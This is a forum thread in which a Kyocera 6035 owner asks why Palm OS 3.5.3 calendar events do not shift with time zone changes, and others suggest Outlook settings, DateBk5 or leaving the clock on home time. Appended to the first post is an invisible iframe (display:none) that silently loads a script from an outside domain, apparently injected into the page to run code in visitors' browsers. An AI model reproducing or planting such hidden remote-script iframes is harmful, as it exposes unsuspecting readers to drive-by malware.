+ Reply to Thread

Time Zone Problems

I am having problems with time zone changes now that I have started traveling with my 6035. Apparently, the 3.5.3 OS on my 6035 does not support time zones. I enter in an event in the Central time zone, say for a conference call at 2pm, either in the Palm or using Outlook and syncing. When I travel to a new time zone (Eastern), my 6035 changes the time zone appropriately via the cell coverage in the area. My phone shows the correct time for my physical location, but when I go to the calendar, it still shows my conference call at 2pm, which is now 1pm in the current time zone. This creates a problem for me since I travel a lot and miss a lot of events due to the schedule not being correct. I want to upgrade to the 7135 which has the 4.1.1 OS but I don't know if I'll have the same problem. According to the Palm and Kyocera websites, v4.1.1 is supposed to have time zone support. I know the PocketPC software handles the time zone issue correctly. I really like having my phone and PDA in one unit and don't want to go with the PocketPC versions. Has anyone else experienced this problem with either phone and come up with a work around? Does anyone know if the 7135 and the 4.1.1 OS suffer the same problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Time Zones

Had this happen to a few of my users here at the office. In Outlook, click on Tools, Options, Calendar Options, Time Zone and make sure that Adjust for Time Zones is selected. Also check you system clock for the same thing.

I use DateBk5 which has support for Time Zones.

hth

DRC
    I haven't traveled yet with my 7135, but when I did with a 6035, I turned off the auto time update, and left things on home time.

Meant I had to think about entering NEW appointments, and do the conversion, but travel was the exception for me.

Good luck
    DRC

Yes, I travel too. You need an application like datebook5 to handle this. I wish it was built in. Perhaps OS5 batebook handles in internally?

Ok, guys. Thanks for the feedback to this point. I've checked Outlook and it's fine, but my problem wasn't with Outlook anyway. It was only on the 6035 that this problem was evident. I searched the FAQ's and the other posts and didn't find anything on this problem or with the fact that the PalmOS can't handle time zones. I even checked Google and there is almost nothing there either.
    So what I'm hearing is that the only way to have time zones work correctly is with the DM5 software, even on the 7135 with the newer PalmOS. Is that correct? Man, I would think Palm would get this problem resolved pronto. Seems like it is a serious shortcoming and would affect a lot of people. Kind of wrong to spend $400-500 on a device and then have to spend more money to get another application for full functionality. Am I missing something here? Ah, technology. Isn't progress grand?

Sorry, I meant DateBook5 software.